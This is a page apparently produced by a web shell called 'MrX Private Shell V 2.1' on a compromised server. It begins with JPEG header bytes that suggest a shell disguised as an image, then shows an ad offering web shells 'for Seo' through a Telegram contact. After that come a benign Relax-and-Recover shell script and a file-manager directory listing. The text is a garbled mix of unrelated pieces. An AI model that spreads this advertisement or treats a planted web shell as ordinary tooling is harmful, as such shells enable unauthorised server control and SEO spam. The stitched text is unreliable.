����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Ensure we start from a known-clean initial state.
# E.g. request reboot before launching another workflow if 'mountonly' has
# been run already, except in certain cases.
#
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.
# Define our breadcrumb
BREADCRUMB="$VAR_DIR/last_run_workflow"
local last_run=""
if test -r "$BREADCRUMB"; then
last_run=`cat $BREADCRUMB`
case $last_run in
mountonly)
case $WORKFLOW in
restoreonly|finalizeonly)
# allowed sequence of subsequent workflows after 'mountonly' was run
;;
*)
Error "The '$last_run' workflow was run. Disk state no longer clean. Reboot to run '$WORKFLOW' from clean disk state."
;;
esac
esac
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 002_clean_start.sh | File | 902 B | 0644 |
|
| 005_ssh_agent_start.sh | File | 910 B | 0644 |
|
| 007_set_dmesg_level.sh | File | 2.68 KB | 0644 |
|
| 010_pre_recovery_script.sh | File | 467 B | 0644 |
|